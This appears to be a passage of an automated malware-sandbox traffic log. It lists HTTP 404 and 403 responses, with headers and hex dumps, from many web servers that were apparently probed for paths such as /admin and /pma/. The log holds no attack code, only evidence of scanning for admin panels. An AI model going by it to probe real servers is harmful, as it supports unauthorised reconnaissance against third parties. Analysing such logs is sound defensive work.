Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276097.2191711446396124247Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqz32kGg/0+YmoIOWNy6M58a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaljisb3AquZ75AMu3lSzmWH/bf8RAwRVMHlkGvQMWkFNuMRNRaVhJq43k38tPlVzdpQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,VmI+uz0B2qfdV6wbOCEtb2BkR6NTdWt8IJ3Oyc5f+zc=,RyJnVEVMrsYVaOqmFkPqWCm8dCSWjTe5w6h2mtrT+e0=,WDMzHiyOL7uW518fW2Byr63cC2NI51j77paRBtQ2JZx2Yn5ajkXY4lhyek6TgNpQ8YH3ZfqxV0ePvdp5BdiFyw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 ed bc ca 00 f3 8f Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveX-Powered-By: PHP/8.1.26Set-Cookie: ad4550d292dd963003562d26fd0f1c62=h8vp69mcsragbouenikl7b2kvl; path=/; HttpOnlyContent-Type: text/html; charset=utf-8Expires: Wed, 17 Aug 2005 00:00:00 GMTLast-Modified: Fri, 22 Dec 2023 20:14:57 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Litespeed-Cache: missContent-Length: 698Content-Encoding: gzipVary: Accept-EncodingDate: Fri, 22 Dec 2023 20:14:57 GMTServer: LiteSpeedX-Content-Type-Options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 55 4d 4f dc 30 10 3d 97 5f 31 f8 dc 6c 10 e5 50 55 49 a4 8a 56 6a 2b 55 20 95 0b 47 c7 9e 24 16 8e 27 b5 9d 85 fc fb 8e 93 dd d5 b2 1f 94 1c c0 78 66 de cc bc 79 1e 8a cb 6f 77 b7 0f 8f f7 df a1 8b bd ad 2e 8a f4 0b ac 74 6d 29 d0 65 6d 2d 40 1b 5f 0a 1b bd 48 56 94 ba ba 00 fe 8a 1e a3 04 d5 49 1f 30 96 62 8c 4d f6 99 3d 3e 2c f7 4e f6 58 8a 16 1d 7a 19 c9 0b 50 e4 22 3a 76 fc 45 d4 5b 79 09 19 dc 0d e8 e0 0f 8d 5e 21 dc 2e 66 f8 2d 9d 6c b1 e7 e3 8c 15 4d b4 58 dd 5c dd b0 fb 3d 1b c0 51 84 86 46 a7 8b 7c b1 b1 93 35 ee 09 3a 8f 4d 29 f2 88 fd 60 65 c4 90 b7 68 42 76 7d 75 fd 29 6f e4 da 70 fa 15 ff 10 e0 d1 96 22 74 e4 a3 1a 23 a4 7b 01 71 1a b8 58 d3 73 82 7c ed f4 aa 37 ca 53 a0 26 a6 10 c7 85 2c 0d ef e7 e9 51 1b 99 87 29 70 c2 5c 85 b0 39 66 c1 44 cc d0 7b f2 8c e2 56 6c d9 a6 8c 93 c5 d0 21 46 01 f9 06 f1 a2 c8 17 3e 8b 9a f4 b4 a1 55 9b 35 28 2b 43 60 fe 13 8e 58 ee 77 36 a3 4b 41 63 e4 62 f0 94 69 8e a9 e9 e5 d8 e5 a4 5b ca 8f 9c e3 34 c5 ec fd 9f f8 54 f8 61 8e a1 2a 42 f4 e4 da ea 91 46 e8 e5 34 43 d6 08 b2 b6 08 91 60 6d 98 26 88 9d 09 30 a4 8c 35 2a 39 06 04 6a be 14 f9 26 b4 c8 87 03 58 b2 af 2f e6 4b 6b 2a e9 60 9b 8f 9b ce a8 c9 34 0b 00 6a a2 a7 5e fa a7 34 7e d6 18 cf 65 0f 9b c3 4e 63 41 40 e9 55 07 e8 5a 66 8f 6b 94 11 3a 19 e0 4c 12 6b 42 34 ae 65 be fc d2 4f 9a ff bb f2 6c d1 7a 46 60 f9 69 90 5a 7b 0c e1 1d c1 13 b3 da c9 35 ee 30 1c 81 54 6a 3f 38 b1 bc e3 f7 3c d2 43 87 ac ce bf 23 b2 76 35 9f c2 f2 18 9f b9 e1 9d 0a 56 e7 c3 bf 3a 98 75 30 33 44 4a 8d de 33 cc 73 67 78 cc 83 a7 54 51 22 87 eb f5 db 34 27 d0 8a fc 70 b2 7b 0a ba b7 28 59 19 d1 4f 40 2e 29 84 db 42 2e cc 5a 7a 4e d8 a9 bf f0 96 6a c6 33 aa 29 e4 f6 29 1b a7 f1 65 35 74 83 a8 7e 50 8f f3 23 28 72 79 62 00 45 7e 88 c6 95 fe 6c 78 41 36 8d 51 a3 8d 06 99 71 f4 81 67 fa 11 86 a5 f4 b4 f8 a4 4a 72 67 62 b1 4e 02 e1 59 f3 72 60 a7 79 37 b2 b6 12 f7 03 af a4 d9 69 a1 b4 46 ee 70 75 dc cf f6 01 46 54 9d 71 0d 1d 3f be a3 76 5f bf ea 43 eb fe 77 94 6e ff 3b b5 0e 5e 5f 9d ff 73 73 9c cf bc f5 96 75 c7 db 6f fe 97 f3 0f 2f 89 9b 8c 83 06 00 00 Data Ascii: UMO0=_1lPUIVj+U G$'xfyow.tm)em-@_HVI0bM=>,NXzP":vE[y^!.f-lMX\=QF\|5:M)`ehBv}u)op"t#{qXs\|7S&,Q)p\9fD{Vl!F>U5(+C`Xw6KA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:58 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 202Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 6d 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /pma/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pvQC8gmoRDaCOX%2FekyfzKoOwvYtnFcLVP5GMFLjQkXETumjPkn0iqB2pUsnn2lMZ3%2BKk5SINaiZN4sF6GJElREPyOSL6Ei7owXIAcACoGV0R82xLUUnsJewBkvJuAdeb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08c0ff876daa-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: 2FA2Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
